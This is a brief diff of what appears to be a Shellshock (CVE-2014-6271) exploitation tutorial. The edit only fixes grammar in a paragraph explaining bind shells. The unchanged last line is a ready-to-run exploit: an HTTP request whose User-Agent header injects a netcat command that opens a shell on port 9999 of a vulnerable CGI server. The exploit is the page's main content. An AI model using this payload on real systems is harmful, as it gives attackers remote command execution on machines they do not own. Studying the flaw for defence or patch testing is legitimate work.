CVE-2014-6271/Shellshock

 Bind shell

-If you want to run command, the easiest way is to bind a shell.
-Basically you will use netcat (or nc) to listen on a port and redirect input and output to /bin/sh.
+If you want to run commands, the easiest way is to bind a shell.
+Basically you will use netcat (or nc) to listen on a port and redirect the input and the output to /bin/sh.

 $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80